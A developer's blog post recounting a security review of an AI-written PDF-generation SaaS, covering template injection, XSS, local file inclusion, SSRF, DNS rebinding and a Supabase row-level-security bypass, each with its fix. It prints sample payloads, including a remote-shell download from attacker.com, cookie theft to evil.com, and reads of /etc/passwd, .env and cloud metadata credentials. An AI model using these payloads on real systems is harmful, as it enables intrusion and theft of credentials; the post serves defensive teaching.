Four months ago, I set myself a challenge: launch a SaaS that solves a pain point from my previous job: API PDF generation from templates.
In 2026, you don't build alone. Claude wrote most of the code. I understand how it all works conceptually, but I couldn't tell you every implementation detail.
One week before launch, I blocked the week to stress-test the whole codebase for security.
Spoiler: out of the box, Claude Code hadn't applied a single security prevention.
To be honest, it wasn't in my CLAUDE.md, and that was intentional. I was building a WYSIWYG editor with HTML templating, and I didn't want the model second-guessing every line with sanitization that would break the core feature. So I never asked for it.
Armed with Claude and a friend who works in cybersecurity, we went hunting. Claude caught most of the obvious holes I'll describe below. But for vulnerabilities 3 and 6, we had to feed it the attack path before it understood the problem.
Here's what we found.
The Stack
- Frontend/CRUD: Next.js
- PDF API: FastAPI (Python)
- Template engine: Jinja2
- HTML to PDF: WeasyPrint
- Database/Auth: Supabase (PostgreSQL + Row Level Security)
- Hosting: Vercel + Google Cloud Run
The core feature: users create HTML/CSS templates with {{variables}}, then call an API with JSON data to generate PDFs.
# Simplified flow
html = user_template # "Hello {{name}}!"
data = {"name": "Alice"}
rendered = jinja2.render(html, data) # "Hello Alice!"
pdf = weasyprint.HTML(rendered).write_pdf()
What could go wrong?
Vulnerability 1: Server-Side Template Injection (SSTI)
Severity: Critical
Jinja2's default Environment class lets you execute code directly.
The Attack
{{ ''.__class__.__mro__[2].__subclasses__() }}
This Python expression:
- Gets the empty string's class (
str) - Walks up the inheritance tree to
object - Lists all subclasses of
object
From there, an attacker can find dangerous classes like subprocess.Popen and achieve Remote Code Execution:
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/bin/bash -c "curl attacker.com/shell.sh | bash"', shell=True) }}
The Fix
Jinja2 has a SandboxedEnvironment that blocks access to dangerous attributes:
from jinja2.sandbox import SandboxedEnvironment
class JinjaTemplateEngine:
def __init__(self):
# SandboxedEnvironment prevents SSTI attacks
self.env = SandboxedEnvironment(
loader=BaseLoader(),
autoescape=False,
)
def render(self, html: str, data: dict) -> str:
template = self.env.from_string(html)
return template.render(**data)
The sandbox blocks access to __class__, __mro__, __subclasses__(), and other dangerous attributes.
Vulnerability 2: XSS in Templates
Severity: High
Users write HTML templates. That HTML gets rendered in the browser when they preview it in the editor.
The Attack
<svg><script>fetch('https://evil.com/steal?c='+document.cookie)</script></svg>
A malicious user creates a template with embedded JavaScript. When another user opens that template in the editor, the script runs and steals their session. Not a big deal since I don't allow template sharing, but risky if for example I load a customer's template during support.
The Fix
Sanitize HTML before storing or rendering:
import nh3
def sanitize_html(html: str) -> str:
return nh3.clean(
html,
tags={"div", "span", "p", "h1", "h2", "h3", "table", "tr", "td", "th",
"img", "style", "header", "footer", "section"},
attributes={
"*": {"class", "id", "style"},
"img": {"src", "alt", "width", "height"},
},
)
The nh3 library (Rust-based, fast) strips all <script> tags, event handlers like onclick, and other XSS vectors while keeping the HTML structure intact.
Vulnerability 3: Local File Inclusion (LFI)
This one is interesting. Claude couldn't find it, and only fixed it partially. Let me explain.
Severity: Critical
WeasyPrint processes HTML like a browser - including fetching resources. By default, it allows the file:// protocol.
The Attack
<link rel="attachment" href="file:///etc/passwd">
Open the resulting PDF in Firefox, and /etc/passwd is embedded as an attachment. Same works for:
<img src="file:///app/backend/.env">
<link href="file:///proc/self/environ" rel="stylesheet">
An attacker could read environment variables (API keys, database credentials), source code, any file the server process can access.
The Fix
Custom URL fetcher that blocks file://:
from weasyprint import default_url_fetcher
def secure_url_fetcher(url: str, timeout: int = 10, ssl_context=None):
parsed = urlparse(url)
scheme = parsed.scheme.lower()
# Block file:// protocol
if scheme == 'file':
raise URLFetcherSecurityError(
f"Access to local files is not allowed: {url}"
)
# Allow data: URLs (inline images)
if scheme == 'data':
return default_url_fetcher(url, timeout=timeout, ssl_context=ssl_context)
# Only allow http/https
if scheme not in ('http', 'https', ''):
raise URLFetcherSecurityError(f"URL scheme '{scheme}' is not allowed")
return default_url_fetcher(url, timeout=timeout, ssl_context=ssl_context)
# Apply to all WeasyPrint calls
HTML(string=html, url_fetcher=secure_url_fetcher)
Claude sanitized templates before saving to the database. Good.
But guess what? Templates aren't the only attack vector. This one is tricky, and Claude couldn't find it at all.
We also have a preview endpoint. It doesn't generate a PDF, just previews the template as HTML. The endpoint is only for authenticated users, but here's the catch: if you use developer tools to grab your JWT token and reuse it in a script, you can send custom HTML directly to the endpoint.
Vulnerability 4: SSRF to Internal IPs
Severity: High
Blocking file:// isn't enough. HTML can reference external images and stylesheets. On cloud platforms, that's a problem.
The Attack
<img src="http://169.254.169.254/latest/meta-data/iam/security-credentials/">
That IP is the cloud metadata endpoint. On GCP, AWS, and Azure, it returns instance credentials, service account tokens, and other secrets.
Also dangerous:
<img src="http://10.0.0.1/admin"> <!-- Internal services -->
<img src="http://localhost:6379/"> <!-- Redis? -->
The Fix
Block all private IP ranges. We used a library for this.
Vulnerability 5: DNS Rebinding (SSRF Bypass)
Not sure this one is a real-world threat, but Claude flagged it, so we fixed it anyway.
Severity: Medium
The SSRF fix checks if the hostname is a private IP. But what if the hostname resolves to a private IP?
The Attack
- Attacker owns
evil.com - Configures DNS with a short TTL:
- First query:
evil.com→203.0.113.50(public IP, passes validation) - After TTL expires:
evil.com→169.254.169.254(metadata!)
- First query:
- Sends HTML:
<img src="http://evil.com/image.png">
- Our validation checks "evil.com" - not a blocked hostname, not an IP - passes
- WeasyPrint resolves DNS again (rebind happened) → fetches
http://169.254.169.254/
The Fix
Resolve the hostname and validate the actual IP before fetching:
import socket
def _resolve_hostname(hostname: str) -> list[str]:
try:
results = socket.getaddrinfo(hostname, None, socket.AF_UNSPEC)
return list(set(r[4][0] for r in results))
except socket.gaierror:
return []
def secure_url_fetcher(url: str, timeout: int = 10, ssl_context=None):
# ... existing checks ...
# Resolve hostname and validate ALL resulting IPs
resolved_ips = _resolve_hostname(hostname)
if not resolved_ips:
raise URLFetcherSecurityError(f"Could not resolve hostname: {hostname}")
for ip_str in resolved_ips:
if _is_private_ip(ip_str):
raise URLFetcherSecurityError(
f"Hostname '{hostname}' resolves to a private IP address"
)
return default_url_fetcher(url, timeout=timeout, ssl_context=ssl_context)
Vulnerability 6: Supabase RLS Bypass
Claude couldn't find this one either - at least not in defense mode. But it found it instantly in attack mode. We ran Claude in two scenarios: "look at this code and tell me what's wrong" vs "here's a Supabase app, try to hack it." Night and day.
Severity: Critical
Supabase uses Row Level Security to restrict data access. My policies looked fine:
CREATE POLICY "Users can view own templates"
ON templates FOR SELECT
USING (auth.uid() = user_id);
Users can only see their own templates. Great.
The Attack
The profiles table had an is_admin column. The RLS policy for admin endpoints checked this column:
CREATE POLICY "Admins can view all templates"
ON templates FOR SELECT
USING (
EXISTS (
SELECT 1 FROM profiles
WHERE profiles.id = auth.uid()
AND profiles.is_admin = true
)
);
The problem: users could update their own profile. Including is_admin.
// Any authenticated user could do this
await supabase
.from('profiles')
.update({ is_admin: true })
.eq('id', myUserId)
Instant admin access.
The Fix
Column-level security - Remove is_admin from the client-updatable columns:
-- Profiles update policy: explicit column list
CREATE POLICY "Users can update own profile"
ON profiles FOR UPDATE
USING (auth.uid() = id)
WITH CHECK (auth.uid() = id);
-- Then use a security definer function for admin checks
-- that reads from a separate, locked-down table
What I learned
The biggest lesson wasn't about any specific vulnerability. LLMs are blind to attack paths when they're reviewing code. Ask Claude "what's wrong with this?" and it checks for patterns it knows are bad. Some vulnerabilities hide in plain sight though - they're not in any single file, they're in how pieces interact.
Put the same LLM in attack mode - "here's the app, break it" - and suddenly it thinks like an attacker. It chains things together. It asks "what if I do this, then this?" That's when it found the RLS bypass in seconds.
If you're using AI for security reviews, don't just ask it to check your code. Give it a target and tell it to hack it.
Hope this helps some fellow builders.
Vince
Top comments (0)